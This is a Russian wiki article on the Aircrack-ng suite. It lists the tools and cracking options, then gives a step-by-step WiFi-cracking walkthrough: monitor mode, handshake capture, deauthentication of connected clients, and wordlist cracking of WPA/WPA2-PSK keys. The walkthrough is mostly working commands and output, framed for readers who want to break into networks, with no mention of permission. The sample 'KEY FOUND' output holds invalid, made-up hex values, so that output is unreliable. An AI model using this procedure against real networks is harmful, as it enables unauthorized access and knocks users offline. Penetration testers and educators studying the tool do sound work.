Aircrack-ng

Материал из Национальной библиотеки им. Н. Э. Баумана
Последнее изменение этой страницы: 01:05, 19 декабря 2017.
Aircrack-ng
Aircrack-ng-new-logo.jpg
Разработчики: Thomas d'Otreppe
Написана на: C
Операционная система: Кросс-платформенное
Тип ПО: Анализатор трафика (сниффер), проверка на возможность проникновения и аудит беспроводных сетей
Лицензия: GNU GPL
Веб-сайт aircrack-ng.org

Aircrack-ng — это набор программ, которые предназначены для обнаружения, анализа, перехвата и взлома беспроводных сетей и соответствующего сетевого трафика. [Источник 1] С помощью инструментария, представленного в данном пакете, можно взламывать протоколы безопасности WEP и WPA/WPA2-PSK, тестировать беспроводные сети на уязвимость к внешним атакам (penetration test), проводить проверку стойкости сети. Программа работает с любыми беспроводными сетевыми адаптерами, драйвер которых поддерживает режим мониторинга. Aircrack-ng был запущен в конце февраля 2006 года. [Источник 2]

Операционные системы, в которых работает программа

Возможности Aircrack-ng

Aircrack-ng

Программный пакет Aircrack-ng включает:[Источник 3]

  1. aircrack-ng — взламывает ключи WEP и WPA (перебор по словарю);
  2. airdecap-ng — расшифровывает перехваченный трафик при известном ключе;
  3. airmon-ng — выставления различных карт в режим мониторинга;
  4. aireplay-ng — пакетный инжектор (Linux и Microsoft Windows);
  5. airodump-ng — анализатор трафика: помещает трафик в файлы PCAP или IVS и показывает информацию о сетях;
  6. airtun-ng — создаёт виртуальный интерфейс туннелирования;
  7. airolib-ng — хранит и управляет списками ESSID и паролей, понижает KPS атак WPA;
  8. packetforge-ng — создаёт шифрованные пакеты для инъекции;
  9. airbase-ng — предоставляет техники для атаки клиента;
  10. airdecloak-ng — убирает WEP-маскировку с файлов pcap;
  11. airdriver-ng — инструмент для управления драйверами беспроводных сетевых карт;
  12. airolib-ng — хранит и управляет списками ESSID и паролей, вычисляет парные мастер-ключи;
  13. airserv-ng — открывает доступ к беспроводной сетевой карте с других компьютеров;
  14. buddy-ng — сервер-помощник для easside-ng, запущенный на удалённом компьютере;
  15. easside-ng — инструмент для коммуникации с точкой доступа без наличия WEP-ключа;
  16. tkiptun-ng — атака WPA/TKIP;
  17. wesside-ng — автоматический инструмент для восстановления WEP-ключа.

Параметры AirCrazk-ng

Вы можете определять множество файлов для ввода (в формате.cap или.ivs). Также вы можете запускать airodump-ng и aircrack-ngодновременно. Aircrack-ng автоматически обновит свои данные при поступлении новых IV в файл дампа.

Вот список возможных параметров:

Общие параметры:

-a Принудительный режим атаки, 1 или wep для WEP и 2либо wpa для WPA-PSK
-e Выберите цель атаки на основании ESSID. Этот параметр также требуется для взлома WPA если SSID скрыто
-b или -bssid Выбрать цель на основании MAC адреса точки доступа
-p Установите эту опцию равной, числу процессоров которые используете, доступно только в SMP системах. По умолчанию используются все доступные процессоры
-q Если будет выбран этот параметр на дисплей не будет, выводится никакой информации о состоянии
-C или -combine Объединяет все MAC точки доступа, разделенные запятыми, в одну виртуальную
-I Записать ключ в файл
-E Создать Elcomsoft Wireless Security Auditor (EWSA). Файл проекта версии v3.02

Статистические варианты взлома WEP:

-c Поиск только буквенно цифровых символов
-t Поиск бинарных кодов, только десятичных символов
-h Поиск цифровых клавиш для Fritz!
-d или -debug Указать маску ключа. Например: A1:XX:CF
-m Выбирать из пакетов Ivs соответствующих только данному MAC адресу. Кроме того использование -m ff:ff:ff:ff:ff:ff позволяет использовать все Ivs, независимо от сети. Это значит что отключается ESSID и BSSIDфильтрация
-n Укажите длину ключа: 64 для 40-bit WEP, 128 для 104-bit WEP и тд. длина до 512 bits. По умолчанию длина ключа задана 128 bit
-i Сохранять только Ivs введенный ключевой индекс от 1до 4. По умолчанию игнорируется ключевой индекс пакета
-f По умолчанию этот параметр установлен на 2. Используйте большее значение для увеличения уровня перебора паролей: взлом потребует больше времени, но с большими шансы на успех
-k Существует 17 KoreK атак. Временами одна атака создает большое количество ложноположительных ответов, что мешает нахождению ключа, даже с большим количеством Ivs. Попробуйте -k 1, -k 2, … -k 17 чтобы проверить каждую атаку выборочно
-x или -x0 Отключить последний брутфорс (не рекомендуется)
-x1 Включает последний брутфорс (установлено по умолчанию)
-x2 Включает два последние брутфорса
-X Отключает многопоточный брутфорс ( только для SMP)
-s Показывает ASCII версию ключа с правой части экрана
-y Это экспериментальная атака грубой силы, должна использоваться только тогда когда обычные способы не помогают более чем с одним миллионом Ivs
-z Использование PTW (Andrei Pyshkin, Erik Tews and Ralf-Philipp Weinmann) атак. Данная атака используется по умолчанию
-P или -ptw-debug Отладка PTW: 1отключить klein, 2 PTW
-K Использование KoreK атаки вместо PTW
-D или -wep-decloak WEP decloak режим
-1 или -oneshot Запустить только одну попытку взломать ключ с PTW
-M Указать какое количество IVs использовать

WEP и WPA-PSK параметры взлома

-S тест скорости взлома WPA
-r Путь к airolib-ng базе данных. Нельзя использовать вместе с «-w»

Другие параметры:

-H или -help Показать экран помощи
-u или -cpu-detect Показать информацию о количестве процессоров MMX/SSE поддержке

Основные шаги для взлома Wi Fi

  • Во-первых, нужно установить последнюю версию aircrack-ng. Не стоит устанавливать устаревший aircrack-ng, если вы действительно хотите взломать WiFi.
  • Во-вторых, необходимо перевести беспроводной сетевой интерфейс в режим мониторинга с помощью airmon-ng. Режим мониторинга позволяет компьютеру с беспроводным сетевым интерфейсом мониторить весь трафик в беспроводной сети. Режим мониторинга позволяет перехватывать все передающиеся пакеты без непосредственного подключения к какому-либо WiFi роутеру.
  • В-третьих, нужно запустить airodump-ng с целью перехвата рукопожатия на канале точки доступа с фильтрацией по BSSID. Когда беспроводной адаптер переведен в режим мониторинга, появляется возможность видеть весь проходящий трафик.
  • В-четвертых, нужно использовать aireplay-ng для деаутентификации клиента.
  • В-пятых, требуется запустить aircrack-ng для взлома WEP/WPA-PSK с помощью перехваченного рукопожатия.

Установка aircrack-ng

Необходимо установить последнюю версию

$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz  -O - | tar -xz
$ cd aircrack-ng-1.2-rc4
$ sudo make
$ sudo make install

Примечание:

  • В некоторых ОС aircrack-ng устанавливается при установке самой ОС (KaliLinux)
  • Несекторные ОС в своей сборке имеют aircrack-ng, в таком для установки требуется прописать лишь одну команду sudo apt-get install aircrack-ng

Запуск беспроводного интерфейса в режим мониторинга

$ sudo airmon-ng start wlan0
Interface	Chipset		Driver
wlan0		Intel 6235	iwlwifi - [phy0]
				(monitor mode enabled on mon0)

Таким образом, airmon-ng создал новый беспроводной интерфейс mon0 и переключил его в режим мониторинга. Однако стоит обратить внимание на то что для различных беспроводных адаптеров название беспроводного интерфейса в режиме мониторинга может быть другим. (wlan0mon, ath0)

Перехват рукопожатия

Это сообщение означает, что airodump-ng успешно перехватил рукопожатие

CH 1 ][ Elapsed: 45 s ][ 2014-05-29 13:15  WPA handshake: 00:11:22:33:44:55

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:11:22:33:44:55  -48      212     1536   66   1  54e  WPA2 CCMP   PSK  CrackMe

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44    0 - 1    114       56

Деаутентификации клиента

Отправка широковещательного deauth сообщения, этим действием AirCrack-ng создает в устройстве подключенному к сети ситуацию деаутентификации от нее, таким образом устройство начинает проверку "рукопожатий" в следствии чего AirCrack и перехватывает его.

Стоит обратить внимание что данный шаг является не обязательным, можно просто подождать когда к интересующей нас сети подключиться любое другое устройство.

 $ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 mon0 --ignore-negative-one

Взлом WiFi пароля

При взломе пароля, самым важным является ваш словарь. От словаря зависит будет ли возможным взломать данную сеть или нет. Во множестве операционных систем предоставляется словарь. Пример password.lst, rockyou.lst и worldlist.dic. Однако если вы хотите успешно взломать сеть, то стоит запастись терпением и парочкой хороших словарей. Выполните следующую команду, чтобы взломать WPA/WPA2-PSK:

$ aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack.cap

При успешном взломе появиться следующее окно

                                                AirCrack-ng 1.2 rc4
      
      [03:12:11]    4307/25320 keys tested (388.86 k/s)

      Time left: 3 hours 12 minutes 9 seconds                                    17.02%

                                             KEY FOUND!  [ password123 ]


      Master Key            : F5 DF A6 40 F1 7A FC 00 58 DE A1 99 A6 DA A7 34
                              14 3A 3D D6 5C 9F 53 CB 81 35 68 04 72 06 26 9E

      Trasient Key          : 2E 65 43 EW 32 EW FR 43 R4 5T W2 E3 R4 T5 DE W0
                              2W E3 R4 SD B5 V5 V6 HY 2E DE F5 5G 4T 5T Y6 GR
                              3E FR X1 X4 G5 GH NJ FV DS RT 6Y U7 FR 1V 5V Y6 
                              1G 6U K8 M8 Y7 I1 A0 T7 E3 0O 00 15 71 3G 5T GT

      EAPOL HMAC            : R4 T5 FG J7 D8 GT 23 55 Y6 0O 0P 02 R4 T5 99 R4 

Пример по использованию AirCrack-ng на KaliLinux

Место для видео

Пример по использованию AirCrack-ng на Ubuntu

Место для видео

Работа AirCrack-ng в Ubuntu 16.04.3

Последнее время множество пользователей последней версии Ubuntu встречаются с проблемной работой Aircrack-ng, а именно не корректную работу wi-fi адаптера в режиме мониторинга. Для решения данной проблемы существует набор команд который может помочь вам решить данную проблему.

  • sudo apt-get autoremove aircrack-ng
  • sudo apt-get install subversion
  • sudo apt-get install libnl-3-dev
  • sudo apt-get install libssl-dev
  • sudo apt-get install sqlite3
  • sudo apt-get install libsqlite3-dev
  • sudo apt-get install libnl-genl-3-dev
  • cd aircrack-ng
  • make sqlite=true experimental=true ext_scripts=true
  • sudo make sqlite=true experimental=true ext_scripts=true install
  • sudo airodump-ng-oui-update


Данный набор команд позволяет обновить основные зависимости для AirCrack-ng, а также переустановить его используя не стандартную версию предоставляемую в пакете Ubuntu

Источники

  1. Как пользоваться Aircrack-NG [2009-2017] // https://rusadmin.biz/zashhita-i-bezopasnost/kak-polzovatsya-aircrack-ng/ (дата обращения: 7.10.2017)
  2. Aircrack-ng [2009-2017] // URL:http://www.aircrack-ng.org/doku.php (дата обращения:8.10.2017).
  3. Aircrack-ng // Википедия. [2017-2017]. Дата обновления:24.07.2017 URL:https://ru.wikipedia.org/wiki/Aircrack-ng (дата обращения: 9.10.2017).